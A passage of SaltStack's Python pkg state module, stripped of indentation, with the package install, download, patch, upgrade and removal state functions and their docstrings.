),
}
else:
modified_hold = [
hold_ret[x] for x in hold_ret if hold_ret[x]["changes"]
]
not_modified_hold = [
hold_ret[x]
for x in hold_ret
if not hold_ret[x]["changes"] and hold_ret[x]["result"]
]
failed_hold = [
hold_ret[x] for x in hold_ret if not hold_ret[x]["result"]
]
for i in modified_hold:
result["comment"] += ".\n{}".format(i["comment"])
result["result"] = i["result"]
result["changes"][i["name"]] = i["changes"]
for i in not_modified_hold:
result["comment"] += ".\n{}".format(i["comment"])
result["result"] = i["result"]
for i in failed_hold:
result["comment"] += ".\n{}".format(i["comment"])
result["result"] = i["result"]
return result
if to_unpurge and "lowpkg.unpurge" not in __salt__:
ret = {
"name": name,
"changes": {},
"result": False,
"comment": "lowpkg.unpurge not implemented",
}
if warnings:
ret.setdefault("warnings", []).extend(warnings)
return ret
# Remove any targets not returned by _find_install_targets
if pkgs:
pkgs = [dict([(x, y)]) for x, y in targets.items()]
pkgs.extend([dict([(x, y)]) for x, y in to_reinstall.items()])
elif sources:
oldsources = sources
sources = [x for x in oldsources if next(iter(list(x.keys()))) in targets]
sources.extend(
[x for x in oldsources if next(iter(list(x.keys()))) in to_reinstall]
)
comment = []
changes = {"installed": {}}
if __opts__["test"]:
if targets:
if sources:
_targets = targets
else:
_targets = [_get_desired_pkg(x, targets) for x in targets]
summary = ", ".join(targets)
changes["installed"].update(
{x: {"new": "installed", "old": ""} for x in targets}
)
comment.append(
"The following packages would be installed/updated: {}".format(summary)
)
if to_unpurge:
comment.append(
"The following packages would have their selection status "
"changed from 'purge' to 'install': {}".format(", ".join(to_unpurge))
)
changes["installed"].update(
{x: {"new": "installed", "old": ""} for x in to_unpurge}
)
if to_reinstall:
# Add a comment for each package in to_reinstall with its
# pkg.verify output
if reinstall:
reinstall_targets = []
for reinstall_pkg in to_reinstall:
if sources:
reinstall_targets.append(reinstall_pkg)
else:
reinstall_targets.append(
_get_desired_pkg(reinstall_pkg, to_reinstall)
)
changes["installed"].update(
{x: {"new": "installed", "old": ""} for x in reinstall_targets}
)
msg = "The following packages would be reinstalled: "
msg += ", ".join(reinstall_targets)
comment.append(msg)
else:
for reinstall_pkg in to_reinstall:
if sources:
pkgstr = reinstall_pkg
else:
pkgstr = _get_desired_pkg(reinstall_pkg, to_reinstall)
comment.append(
"Package '{}' would be reinstalled because the "
"following files have been altered:".format(pkgstr)
)
changes["installed"].update({reinstall_pkg: {}})
comment.append(_nested_output(altered_files[reinstall_pkg]))
ret = {
"name": name,
"changes": changes,
"result": None,
"comment": "\n".join(comment),
}
if warnings:
ret.setdefault("warnings", []).extend(warnings)
return ret
modified_hold = None
not_modified_hold = None
failed_hold = None
if targets or to_reinstall:
try:
pkg_ret = __salt__["pkg.install"](
name=None,
refresh=refresh,
version=version,
fromrepo=fromrepo,
skip_verify=skip_verify,
pkgs=pkgs,
sources=sources,
reinstall=bool(to_reinstall),
normalize=normalize,
update_holds=update_holds,
ignore_epoch=ignore_epoch,
**kwargs
)
except CommandExecutionError as exc:
ret = {"name": name, "result": False}
if exc.info:
# Get information for state return from the exception.
ret["changes"] = exc.info.get("changes", {})
ret["comment"] = exc.strerror_without_changes
else:
ret["changes"] = {}
ret[
"comment"
] = "An error was encountered while installing package(s): {}".format(
exc
)
if warnings:
ret.setdefault("warnings", []).extend(warnings)
return ret
if refresh:
refresh = False
if isinstance(pkg_ret, dict):
changes["installed"].update(pkg_ret)
elif isinstance(pkg_ret, str):
comment.append(pkg_ret)
# Code below will be looking for a dictionary. If this is a string
# it means that there was an exception raised and that no packages
# changed, so now that we have added this error to the comments we
# set this to an empty dictionary so that the code below which
# checks reinstall targets works.
pkg_ret = {}
if "pkg.hold" in __salt__ and "hold" in kwargs:
try:
action = "pkg.hold" if kwargs["hold"] else "pkg.unhold"
hold_ret = __salt__[action](name=name, pkgs=desired)
except (CommandExecutionError, SaltInvocationError) as exc:
comment.append(str(exc))
ret = {
"name": name,
"changes": changes,
"result": False,
"comment": "\n".join(comment),
}
if warnings:
ret.setdefault("warnings", []).extend(warnings)
return ret
else:
if "result" in hold_ret and not hold_ret["result"]:
ret = {
"name": name,
"changes": {},
"result": False,
"comment": (
"An error was encountered while "
"holding/unholding package(s): {}".format(hold_ret["comment"])
),
}
if warnings:
ret.setdefault("warnings", []).extend(warnings)
return ret
else:
modified_hold = [
hold_ret[x] for x in hold_ret if hold_ret[x]["changes"]
]
not_modified_hold = [
hold_ret[x]
for x in hold_ret
if not hold_ret[x]["changes"] and hold_ret[x]["result"]
]
failed_hold = [
hold_ret[x] for x in hold_ret if not hold_ret[x]["result"]
]
if to_unpurge:
changes["purge_desired"] = __salt__["lowpkg.unpurge"](*to_unpurge)
# Analyze pkg.install results for packages in targets
if sources:
modified = [x for x in changes["installed"] if x in targets]
not_modified = [
x for x in desired if x not in targets and x not in to_reinstall
]
failed = [x for x in targets if x not in modified]
else:
if __grains__["os"] == "FreeBSD":
kwargs["with_origin"] = True
new_pkgs = __salt__["pkg.list_pkgs"](versions_as_list=True, **kwargs)
if (
kwargs.get("resolve_capabilities", False)
and "pkg.list_provides" in __salt__
):
new_caps = __salt__["pkg.list_provides"](**kwargs)
else:
new_caps = {}
_ok, failed = _verify_install(
desired, new_pkgs, ignore_epoch=ignore_epoch, new_caps=new_caps
)
modified = [x for x in _ok if x in targets]
not_modified = [x for x in _ok if x not in targets and x not in to_reinstall]
failed = [x for x in failed if x in targets]
# If there was nothing unpurged, just set the changes dict to the contents
# of changes['installed'].
if not changes.get("purge_desired"):
changes = changes["installed"]
if modified:
if sources:
summary = ", ".join(modified)
else:
summary = ", ".join([_get_desired_pkg(x, desired) for x in modified])
if len(summary) < 20:
comment.append(
"The following packages were installed/updated: {}".format(summary)
)
else:
comment.append(
"{} targeted package{} {} installed/updated.".format(
len(modified),
"s" if len(modified) > 1 else "",
"were" if len(modified) > 1 else "was",
)
)
if modified_hold:
for i in modified_hold:
change_name = i["name"]
if change_name in changes:
comment.append(i["comment"])
if len(changes[change_name]["new"]) > 0:
changes[change_name]["new"] += "\n"
changes[change_name]["new"] += "{}".format(i["changes"]["new"])
if len(changes[change_name]["old"]) > 0:
changes[change_name]["old"] += "\n"
changes[change_name]["old"] += "{}".format(i["changes"]["old"])
else:
comment.append(i["comment"])
changes[change_name] = {}
changes[change_name]["new"] = "{}".format(i["changes"]["new"])
# Any requested packages that were not targeted for install or reinstall
if not_modified:
if sources:
summary = ", ".join(not_modified)
else:
summary = ", ".join([_get_desired_pkg(x, desired) for x in not_modified])
if len(not_modified) <= 20:
comment.append(
"The following packages were already installed: {}".format(summary)
)
else:
comment.append(
"{} targeted package{} {} already installed".format(
len(not_modified),
"s" if len(not_modified) > 1 else "",
"were" if len(not_modified) > 1 else "was",
)
)
if not_modified_hold:
for i in not_modified_hold:
comment.append(i["comment"])
result = True
if failed:
if sources:
summary = ", ".join(failed)
else:
summary = ", ".join([_get_desired_pkg(x, desired) for x in failed])
comment.insert(
0, "The following packages failed to install/update: {}".format(summary)
)
result = False
if failed_hold:
for i in failed_hold:
comment.append(i["comment"])
result = False
# Get the ignore_types list if any from the pkg_verify argument
if isinstance(pkg_verify, list) and any(
x.get("ignore_types") is not None
for x in pkg_verify
if isinstance(x, _OrderedDict) and "ignore_types" in x
):
ignore_types = next(
x.get("ignore_types") for x in pkg_verify if "ignore_types" in x
)
else:
ignore_types = []
# Get the verify_options list if any from the pkg_verify argument
if isinstance(pkg_verify, list) and any(
x.get("verify_options") is not None
for x in pkg_verify
if isinstance(x, _OrderedDict) and "verify_options" in x
):
verify_options = next(
x.get("verify_options") for x in pkg_verify if "verify_options" in x
)
else:
verify_options = []
# Rerun pkg.verify for packages in to_reinstall to determine failed
modified = []
failed = []
for reinstall_pkg in to_reinstall:
if reinstall:
if reinstall_pkg in pkg_ret:
modified.append(reinstall_pkg)
else:
failed.append(reinstall_pkg)
elif pkg_verify:
# No need to wrap this in a try/except because we would already
# have caught invalid arguments earlier.
verify_result = __salt__["pkg.verify"](
reinstall_pkg,
ignore_types=ignore_types,
verify_options=verify_options,
**kwargs
)
if verify_result:
failed.append(reinstall_pkg)
altered_files[reinstall_pkg] = verify_result
else:
modified.append(reinstall_pkg)
if modified:
# Add a comment for each package in modified with its pkg.verify output
for modified_pkg in modified:
if sources:
pkgstr = modified_pkg
else:
pkgstr = _get_desired_pkg(modified_pkg, desired)
msg = "Package {} was reinstalled.".format(pkgstr)
if modified_pkg in altered_files:
msg += " The following files were remediated:"
comment.append(msg)
comment.append(_nested_output(altered_files[modified_pkg]))
else:
comment.append(msg)
if failed:
# Add a comment for each package in failed with its pkg.verify output
for failed_pkg in failed:
if sources:
pkgstr = failed_pkg
else:
pkgstr = _get_desired_pkg(failed_pkg, desired)
msg = "Reinstall was not successful for package {}.".format(pkgstr)
if failed_pkg in altered_files:
msg += " The following files could not be remediated:"
comment.append(msg)
comment.append(_nested_output(altered_files[failed_pkg]))
else:
comment.append(msg)
result = False
ret = {
"name": name,
"changes": changes,
"result": result,
"comment": "\n".join(comment),
}
if warnings:
ret.setdefault("warnings", []).extend(warnings)
return ret
def downloaded(
name, version=None, pkgs=None, fromrepo=None, ignore_epoch=None, **kwargs
):
"""
.. versionadded:: 2017.7.0
Ensure that the package is downloaded, and that it is the correct version
(if specified).
.. note::
Any argument which is either a) not explicitly defined for this state,
or b) not a global state argument like ``saltenv``, or
``reload_modules``, will be passed through to the call to
``pkg.install`` to download the package(s). For example, you can include
a ``disablerepo`` argument on platforms that use yum/dnf to disable
that repo:
.. code-block:: yaml
mypkg:
pkg.downloaded:
- disablerepo: base,updates
To see what is supported, check :ref:`this page <virtual-pkg>` to find
the documentation for your platform's ``pkg`` module, then look at the
documentation for the ``install`` function.
Any argument that is passed through to the ``install`` function, which
is not defined for that function, will be silently ignored.
Currently supported for the following pkg providers:
:mod:`yumpkg <salt.modules.yumpkg>`, :mod:`zypper <salt.modules.zypper>` and :mod:`zypper <salt.modules.aptpkg>`
:param str name:
The name of the package to be downloaded. This parameter is ignored if
either "pkgs" is used. Additionally, please note that this option can
only be used to download packages from a software repository.
:param str version:
Download a specific version of a package.
.. important::
As of version 2015.8.7, for distros which use yum/dnf, packages
which have a version with a nonzero epoch (that is, versions which
start with a number followed by a colon must have the epoch included
when specifying the version number. For example:
.. code-block:: yaml
vim-enhanced:
pkg.downloaded:
- version: 2:7.4.160-1.el7
An **ignore_epoch** argument has been added to which causes the
epoch to be disregarded when the state checks to see if the desired
version was installed.
You can install a specific version when using the ``pkgs`` argument by
including the version after the package:
.. code-block:: yaml
common_packages:
pkg.downloaded:
- pkgs:
- unzip
- dos2unix
- salt-minion: 2015.8.5-1.el6
:param bool resolve_capabilities:
Turn on resolving capabilities. This allow one to name "provides" or alias names for packages.
.. versionadded:: 2018.3.0
CLI Example:
.. code-block:: yaml
zsh:
pkg.downloaded:
- version: 5.0.5-4.63
- fromrepo: "myrepository"
"""
ret = {"name": name, "changes": {}, "result": None, "comment": ""}
if "pkg.list_downloaded" not in __salt__:
ret["result"] = False
ret["comment"] = "The pkg.downloaded state is not available on this platform"
return ret
if isinstance(pkgs, list) and len(pkgs) == 0:
ret["result"] = True
ret["comment"] = "No packages to download provided"
return ret
# If just a name (and optionally a version) is passed, just pack them into
# the pkgs argument.
if name and not pkgs:
if version:
pkgs = [{name: version}]
version = None
else:
pkgs = [name]
# It doesn't make sense here to received 'downloadonly' as kwargs
# as we're explicitly passing 'downloadonly=True' to execution module.
if "downloadonly" in kwargs:
del kwargs["downloadonly"]
pkgs, _refresh = _resolve_capabilities(pkgs, **kwargs)
# Only downloading not yet downloaded packages
targets = _find_download_targets(
name, version, pkgs, fromrepo=fromrepo, ignore_epoch=ignore_epoch, **kwargs
)
if isinstance(targets, dict) and "result" in targets:
return targets
elif not isinstance(targets, dict):
ret["result"] = False
ret["comment"] = "An error was encountered while checking targets: {}".format(
targets
)
return ret
if __opts__["test"]:
summary = ", ".join(targets)
ret["comment"] = "The following packages would be downloaded: {}".format(
summary
)
return ret
try:
pkg_ret = __salt__["pkg.install"](
name=name,
pkgs=pkgs,
version=version,
downloadonly=True,
fromrepo=fromrepo,
ignore_epoch=ignore_epoch,
**kwargs
)
ret["result"] = True
ret["changes"].update(pkg_ret)
except CommandExecutionError as exc:
ret = {"name": name, "result": False}
if exc.info:
# Get information for state return from the exception.
ret["changes"] = exc.info.get("changes", {})
ret["comment"] = exc.strerror_without_changes
else:
ret["changes"] = {}
ret[
"comment"
] = "An error was encountered while downloading package(s): {}".format(exc)
return ret
new_pkgs = __salt__["pkg.list_downloaded"](**kwargs)
_ok, failed = _verify_install(targets, new_pkgs, ignore_epoch=ignore_epoch)
if failed:
summary = ", ".join([_get_desired_pkg(x, targets) for x in failed])
ret["result"] = False
ret["comment"] = "The following packages failed to download: {}".format(summary)
if not ret["changes"] and not ret["comment"]:
ret["result"] = True
ret["comment"] = "Packages downloaded: {}".format(", ".join(targets))
return ret
def patch_installed(name, advisory_ids=None, downloadonly=None, **kwargs):
"""
.. versionadded:: 2017.7.0
Ensure that packages related to certain advisory ids are installed.
.. note::
Any argument which is either a) not explicitly defined for this state,
or b) not a global state argument like ``saltenv``, or
``reload_modules``, will be passed through to the call to
``pkg.install`` to install the patch(es).
To see what is supported, check :ref:`this page <virtual-pkg>` to find
the documentation for your platform's ``pkg`` module, then look at the
documentation for the ``install`` function.
Any argument that is passed through to the ``install`` function, which
is not defined for that function, will be silently ignored.
Currently supported for the following pkg providers:
:mod:`yumpkg <salt.modules.yumpkg>` and :mod:`zypper <salt.modules.zypper>`
CLI Example:
.. code-block:: yaml
issue-foo-fixed:
pkg.patch_installed:
- advisory_ids:
- SUSE-SLE-SERVER-12-SP2-2017-185
- SUSE-SLE-SERVER-12-SP2-2017-150
- SUSE-SLE-SERVER-12-SP2-2017-120
"""
ret = {"name": name, "changes": {}, "result": None, "comment": ""}
if "pkg.list_patches" not in __salt__:
ret["result"] = False
ret[
"comment"
] = "The pkg.patch_installed state is not available on this platform"
return ret
if isinstance(advisory_ids, list) and len(advisory_ids) == 0:
ret["result"] = True
ret["comment"] = "No advisory ids provided"
return ret
# Only downloading not yet downloaded packages
targets = _find_advisory_targets(name, advisory_ids, **kwargs)
if isinstance(targets, dict) and "result" in targets:
return targets
elif not isinstance(targets, list):
ret["result"] = False
ret["comment"] = "An error was encountered while checking targets: {}".format(
targets
)
return ret
if __opts__["test"]:
summary = ", ".join(targets)
ret[
"comment"
] = "The following advisory patches would be downloaded: {}".format(summary)
return ret
try:
pkg_ret = __salt__["pkg.install"](
name=name, advisory_ids=advisory_ids, downloadonly=downloadonly, **kwargs
)
ret["result"] = True
ret["changes"].update(pkg_ret)
except CommandExecutionError as exc:
ret = {"name": name, "result": False}
if exc.info:
# Get information for state return from the exception.
ret["changes"] = exc.info.get("changes", {})
ret["comment"] = exc.strerror_without_changes
else:
ret["changes"] = {}
ret[
"comment"
] = "An error was encountered while downloading package(s): {}".format(exc)
return ret
if not ret["changes"] and not ret["comment"]:
status = "downloaded" if downloadonly else "installed"
ret["result"] = True
ret[
"comment"
] = "Advisory patch is not needed or related packages are already {}".format(
status
)
return ret
def patch_downloaded(name, advisory_ids=None, **kwargs):
"""
.. versionadded:: 2017.7.0
Ensure that packages related to certain advisory ids are downloaded.
Currently supported for the following pkg providers:
:mod:`yumpkg <salt.modules.yumpkg>` and :mod:`zypper <salt.modules.zypper>`
CLI Example:
.. code-block:: yaml
preparing-to-fix-issues:
pkg.patch_downloaded:
- advisory_ids:
- SUSE-SLE-SERVER-12-SP2-2017-185
- SUSE-SLE-SERVER-12-SP2-2017-150
- SUSE-SLE-SERVER-12-SP2-2017-120
"""
if "pkg.list_patches" not in __salt__:
return {
"name": name,
"result": False,
"changes": {},
"comment": (
"The pkg.patch_downloaded state is not available on this platform"
),
}
# It doesn't make sense here to received 'downloadonly' as kwargs
# as we're explicitly passing 'downloadonly=True' to execution module.
if "downloadonly" in kwargs:
del kwargs["downloadonly"]
return patch_installed(
name=name, advisory_ids=advisory_ids, downloadonly=True, **kwargs
)
def latest(
name,
refresh=None,
fromrepo=None,
skip_verify=False,
pkgs=None,
watch_flags=True,
**kwargs
):
"""
Ensure that the named package is installed and the latest available
package. If the package can be updated, this state function will update
the package. Generally it is better for the
:mod:`installed <salt.states.pkg.installed>` function to be
used, as :mod:`latest <salt.states.pkg.latest>` will update the package
whenever a new package is available.
.. note::
Any argument which is either a) not explicitly defined for this state,
or b) not a global state argument like ``saltenv``, or
``reload_modules``, will be passed through to the call to
``pkg.install`` to install the package(s). For example, you can include
a ``disablerepo`` argument on platforms that use yum/dnf to disable
that repo:
.. code-block:: yaml
mypkg:
pkg.latest:
- disablerepo: base,updates
To see what is supported, check :ref:`this page <virtual-pkg>` to find
the documentation for your platform's ``pkg`` module, then look at the
documentation for the ``install`` function.
Any argument that is passed through to the ``install`` function, which
is not defined for that function, will be silently ignored.
name
The name of the package to maintain at the latest available version.
This parameter is ignored if "pkgs" is used.
fromrepo
Specify a repository from which to install
skip_verify
Skip the GPG verification check for the package to be installed
refresh
This parameter controls whether or not the package repo database is
updated prior to checking for the latest available version of the
requested packages.
If ``True``, the package database will be refreshed (``apt-get update``
or equivalent, depending on platform) before checking for the latest
available version of the requested packages.
If ``False``, the package database will *not* be refreshed before
checking.
If unset, then Salt treats package database refreshes differently
depending on whether or not a ``pkg`` state has been executed already
during the current Salt run. Once a refresh has been performed in a
``pkg`` state, for the remainder of that Salt run no other refreshes
will be performed for ``pkg`` states which do not explicitly set
``refresh`` to ``True``. This prevents needless additional refreshes
from slowing down the Salt run.
:param str cache_valid_time:
.. versionadded:: 2016.11.0
This parameter sets the value in seconds after which the cache is
marked as invalid, and a cache update is necessary. This overwrites
the ``refresh`` parameter's default behavior.
Example:
.. code-block:: yaml
httpd:
pkg.latest:
- refresh: True
- cache_valid_time: 300
In this case, a refresh will not take place for 5 minutes since the last
``apt-get update`` was executed on the system.
.. note::
This parameter is available only on Debian based distributions and
has no effect on the rest.
:param bool resolve_capabilities:
Turn on resolving capabilities. This allow one to name "provides" or alias names for packages.
.. versionadded:: 2018.3.0
Multiple Package Installation Options:
(Not yet supported for: FreeBSD, OpenBSD, MacOS, and Solaris pkgutil)
pkgs
A list of packages to maintain at the latest available version.
.. code-block:: yaml
mypkgs:
pkg.latest:
- pkgs:
- foo
- bar
- baz
install_recommends
Whether to install the packages marked as recommended. Default is
``True``. Currently only works with APT-based systems.
.. versionadded:: 2015.5.0
.. code-block:: yaml
httpd:
pkg.latest:
- install_recommends: False
only_upgrade
Only upgrade the packages, if they are already installed. Default is
``False``. Currently only works with APT-based systems.
.. versionadded:: 2015.5.0
.. code-block:: yaml
httpd:
pkg.latest:
- only_upgrade: True
.. note::
If this parameter is set to True and the package is not already
installed, the state will fail.
report_reboot_exit_codes
If the installer exits with a recognized exit code indicating that
a reboot is required, the module function
*win_system.set_reboot_required_witnessed*
will be called, preserving the knowledge of this event
for the remainder of the current boot session. For the time being,
``3010`` is the only recognized exit code, but this
is subject to future refinement. The value of this param
defaults to ``True``. This parameter has no effect on
non-Windows systems.
.. versionadded:: 2016.11.0
.. code-block:: yaml
ms vcpp installed:
pkg.latest:
- name: ms-vcpp
- report_reboot_exit_codes: False
"""
refresh = salt.utils.pkg.check_refresh(__opts__, refresh)
if kwargs.get("sources"):
return {
"name": name,
"changes": {},
"result": False,
"comment": 'The "sources" parameter is not supported.',
}
elif pkgs:
desired_pkgs = list(_repack_pkgs(pkgs).keys()) # pylint: disable=not-callable
if not desired_pkgs:
# Badly-formatted SLS
return {
"name": name,
"changes": {},
"result": False,
"comment": 'Invalidly formatted "pkgs" parameter. See minion log.',
}
else:
if isinstance(pkgs, list) and len(pkgs) == 0:
return {
"name": name,
"changes": {},
"result": True,
"comment": "No packages to install provided",
}
else:
desired_pkgs = [name]
kwargs["saltenv"] = __env__
# check if capabilities should be checked and modify the requested packages
# accordingly.
desired_pkgs, refresh = _resolve_capabilities(
desired_pkgs, refresh=refresh, **kwargs
)
try:
avail = __salt__["pkg.latest_version"](
*desired_pkgs, fromrepo=fromrepo, refresh=refresh, **kwargs
)
except CommandExecutionError as exc:
return {
"name": name,
"changes": {},
"result": False,
"comment": (
"An error was encountered while checking the "
"newest available version of package(s): {}".format(exc)
),
}
try:
cur = __salt__["pkg.version"](*desired_pkgs, **kwargs)
except CommandExecutionError as exc:
return {"name": name, "changes": {}, "result": False, "comment": exc.strerror}
# Repack the cur/avail data if only a single package is being checked
if isinstance(cur, str):
cur = {desired_pkgs[0]: cur}
if isinstance(avail, str):
avail = {desired_pkgs[0]: avail}
targets = {}
problems = []
for pkg in desired_pkgs:
if not avail.get(pkg):
# Package either a) is up-to-date, or b) does not exist
if not cur.get(pkg):
# Package does not exist
msg = "No information found for '{}'.".format(pkg)
log.error(msg)
problems.append(msg)
elif (
watch_flags
and __grains__.get("os") == "Gentoo"
and __salt__["portage_config.is_changed_uses"](pkg)
):
# Package is up-to-date, but Gentoo USE flags are changing so
# we need to add it to the targets
targets[pkg] = cur[pkg]
else:
# Package either a) is not installed, or b) is installed and has an
# upgrade available
targets[pkg] = avail[pkg]
if problems:
return {
"name": name,
"changes": {},
"result": False,
"comment": " ".join(problems),
}
if targets:
# Find up-to-date packages
if not pkgs:
# There couldn't have been any up-to-date packages if this state
# only targeted a single package and is being allowed to proceed to
# the install step.
up_to_date = []
else:
up_to_date = [x for x in pkgs if x not in targets]
if __opts__["test"]:
comments = []
comments.append(
"The following packages would be installed/upgraded: "
+ ", ".join(sorted(targets))
)
if up_to_date:
up_to_date_count = len(up_to_date)
if up_to_date_count <= 10:
comments.append(
"The following packages are already up-to-date: "
+ ", ".join(
["{} ({})".format(x, cur[x]) for x in sorted(up_to_date)]
)
)
else:
comments.append(
"{} packages are already up-to-date".format(up_to_date_count)
)
return {
"name": name,
"changes": {},
"result": None,
"comment": "\n".join(comments),
}
if salt.utils.platform.is_windows():
# pkg.install execution module on windows ensures the software
# package is installed when no version is specified, it does not
# upgrade the software to the latest. This is per the design.
# Build updated list of pkgs *with verion number*, exclude
# non-targeted ones
targeted_pkgs = [{x: targets[x]} for x in targets]
else:
# Build updated list of pkgs to exclude non-targeted ones
targeted_pkgs = list(targets)
# No need to refresh, if a refresh was necessary it would have been
# performed above when pkg.latest_version was run.
try:
changes = __salt__["pkg.install"](
name=None,
refresh=False,
fromrepo=fromrepo,
skip_verify=skip_verify,
pkgs=targeted_pkgs,
**kwargs
)
except CommandExecutionError as exc:
return {
"name": name,
"changes": {},
"result": False,
"comment": (
"An error was encountered while installing package(s): {}".format(
exc
)
),
}
if changes:
# Find failed and successful updates
failed = [
x
for x in targets
if not changes.get(x)
or changes[x].get("new") != targets[x]
and targets[x] != "latest"
]
successful = [x for x in targets if x not in failed]
comments = []
if failed:
msg = "The following packages failed to update: {}".format(
", ".join(sorted(failed))
)
comments.append(msg)
if successful:
msg = (
"The following packages were successfully "
"installed/upgraded: "
"{}".format(", ".join(sorted(successful)))
)
comments.append(msg)
if up_to_date:
if len(up_to_date) <= 10:
msg = "The following packages were already up-to-date: {}".format(
", ".join(sorted(up_to_date))
)
else:
msg = "{} packages were already up-to-date ".format(len(up_to_date))
comments.append(msg)
return {
"name": name,
"changes": changes,
"result": False if failed else True,
"comment": " ".join(comments),
}
else:
if len(targets) > 10:
comment = (
"{} targeted packages failed to update. "
"See debug log for details.".format(len(targets))
)
elif len(targets) > 1:
comment = (
"The following targeted packages failed to update. "
"See debug log for details: ({}).".format(
", ".join(sorted(targets))
)
)
else:
comment = "Package {} failed to update.".format(
next(iter(list(targets.keys())))
)
if up_to_date:
if len(up_to_date) <= 10:
comment += (
" The following packages were already up-to-date: {}".format(
", ".join(sorted(up_to_date))
)
)
else:
comment += "{} packages were already up-to-date".format(
len(up_to_date)
)
return {
"name": name,
"changes": changes,
"result": False,
"comment": comment,
}
else:
if len(desired_pkgs) > 10:
comment = "All {} packages are up-to-date.".format(len(desired_pkgs))
elif len(desired_pkgs) > 1:
comment = "All packages are up-to-date ({}).".format(
", ".join(sorted(desired_pkgs))
)
else:
comment = "Package {} is already up-to-date".format(desired_pkgs[0])
return {"name": name, "changes": {}, "result": True, "comment": comment}
def _uninstall(
action="remove",
name=None,
version=None,
pkgs=None,
normalize=True,
ignore_epoch=None,
**kwargs
):
"""
Common function for package removal
"""
if action not in ("remove", "purge"):
return {
"name": name,
"changes": {},
"result": False,
"comment": "Invalid action '{}'. This is probably a bug.".format(action),
}
try:
pkg_params = __salt__["pkg_resource.parse_targets"](
name, pkgs, normalize=normalize
)[0]
except MinionError as exc:
return {
"name": name,
"changes": {},
"result": False,
"comment": "An error was encountered while parsing targets: {}".format(exc),
}
targets = _find_remove_targets(
name, version, pkgs, normalize, ignore_epoch=ignore_epoch, **kwargs
)
if isinstance(targets, dict) and "result" in targets:
return targets
elif not isinstance(targets, list):
return {
"name": name,
"changes": {},
"result": False,
"comment": "An error was encountered while checking targets: {}".format(
targets
),
}
if action == "purge":
old_removed = __salt__["pkg.list_pkgs"](
versions_as_list=True, removed=True, **kwargs
)
targets.extend([x for x in pkg_params if x in old_removed])
targets.sort()
if not targets:
return {
"name": name,
"changes": {},
"result": True,
"comment": "None of the targeted packages are installed{}".format(
" or partially installed" if action == "purge" else ""
),
}
if __opts__["test"]:
_changes = {}
_changes.update({x: {"new": "{}d".format(action), "old": ""} for x in targets})
return {
"name": name,
"changes": _changes,
"result": None,
"comment": "The following packages will be {}d: {}.".format(
action, ", ".join(targets)
),
}
changes = __salt__["pkg.{}".format(action)](
name, pkgs=pkgs, version=version, **kwargs
)
new = __salt__["pkg.list_pkgs"](versions_as_list=True, **kwargs)
failed = []
for param in pkg_params:
if __grains__["os_family"] in ["Suse", "RedHat"]:
# Check if the package version set to be removed is actually removed:
if param in new and not pkg_params[param]:
failed.append(param)
elif param in new and pkg_params[param] in new[param]:
failed.append(param + "-" + pkg_params[param])
elif param in new:
failed.append(param)
if action == "purge":
new_removed = __salt__["pkg.list_pkgs"](
versions_as_list=True, removed=True, **kwargs
)
failed.extend([x for x in pkg_params if x in new_removed])
failed.sort()
if failed:
return {
"name": name,
"changes": changes,
"result": False,
"comment": "The following packages failed to {}: {}.".format(
action, ", ".join(failed)
),
}
comments = []
not_installed = sorted([x for x in pkg_params if x not in targets])
if not_installed:
comments.append(
"The following packages were not installed: {}".format(
", ".join(not_installed)
)
)
comments.append(
"The following packages were {}d: {}.".format(action, ", ".join(targets))
)
else:
comments.append("All targeted packages were {}d.".format(action))
return {
"name": name,
"changes": changes,
"result": True,
"comment": " ".join(comments),
}
def removed(name, version=None, pkgs=None, normalize=True, ignore_epoch=None, **kwargs):
"""
Verify that a package is not installed, calling ``pkg.remove`` if necessary
to remove the package.
name
The name of the package to be removed.
version
The version of the package that should be removed. Don't do anything if
the package is installed with an unmatching version.
.. important::
As of version 2015.8.7, for distros which use yum/dnf, packages
which have a version with a nonzero epoch (that is, versions which
start with a number followed by a colon like in the example above)
must have the epoch included when specifying the version number.
For example:
.. code-block:: yaml
vim-enhanced:
pkg.removed:
- version: 2:7.4.160-1.el7
In version 2015.8.9, an **ignore_epoch** argument has been added to
:py:mod:`pkg.installed <salt.states.pkg.installed>`,
:py:mod:`pkg.removed <salt.states.pkg.removed>`, and
:py:mod:`pkg.purged <salt.states.pkg.purged>` states, which
causes the epoch to be disregarded when the state checks to see if
the desired version was installed. If **ignore_epoch** was not set
to ``True``, and instead of ``2:7.4.160-1.el7`` a version of
``7.4.160-1.el7`` were used, this state would report success since
the actual installed version includes the epoch, and the specified
version would not match.
normalize : True
Normalize the package name by removing the architecture, if the
architecture of the package is different from the architecture of the
operating system. The ability to disable this behavior is useful for
poorly-created packages which include the architecture as an actual
part of the name, such as kernel modules which match a specific kernel
version.
.. versionadded:: 2015.8.0
ignore_epoch : None
If this option is not explicitly set, and there is no epoch in the
desired package version, the epoch will be implicitly ignored. Set this
argument to ``True`` to explicitly ignore the epoch, and ``False`` to
strictly enforce it.
.. versionadded:: 2015.8.9
.. versionchanged:: 3001
In prior releases, the default behavior was to strictly enforce
epochs unless this argument was set to ``True``.
Multiple Package Options:
pkgs
A list of packages to remove. Must be passed as a python list. The
``name`` parameter will be ignored if this option is passed. It accepts
version numbers as well.
.. versionadded:: 0.16.0
"""
kwargs["saltenv"] = __env__
try:
return _uninstall(
action="remove",
name=name,
version=version,
pkgs=pkgs,
normalize=normalize,
ignore_epoch=ignore_epoch,
**kwargs
)
except CommandExecutionError as exc:
ret = {"name": name, "result": False}
if exc.info:
# Get information for state return from the exception.
ret["changes"] = exc.info.get("changes", {})
ret["comment"] = exc.strerror_without_changes
else:
ret["changes"] = {}
ret[
"comment"
] = "An error was encountered while removing package(s): {}".format(exc)
return ret
def purged(name, version=None, pkgs=None, normalize=True, ignore_epoch=None, **kwargs):
"""
Verify that a package is not installed, calling ``pkg.purge`` if necessary
to purge the package. All configuration files are also removed.
name
The name of the package to be purged.
version
The version of the package that should be removed. Don't do anything if
the package is installed with an unmatching version.
.. important::
As of version 2015.8.7, for distros which use yum/dnf, packages
which have a version with a nonzero epoch (that is, versions which
start with a number followed by a colon like in the example above)
must have the epoch included when specifying the version number.
For example:
.. code-block:: yaml
vim-enhanced:
pkg.purged:
- version: 2:7.4.160-1.el7
In version 2015.8.9, an **ignore_epoch** argument has been added to
:py:mod:`pkg.installed <salt.states.pkg.installed>`,
:py:mod:`pkg.removed <salt.states.pkg.removed>`, and
:py:mod:`pkg.purged <salt.states.pkg.purged>` states, which
causes the epoch to be disregarded when the state checks to see if
the desired version was installed. If **ignore_epoch** was not set
to ``True``, and instead of ``2:7.4.160-1.el7`` a version of
``7.4.160-1.el7`` were used, this state would report success since
the actual installed version includes the epoch, and the specified
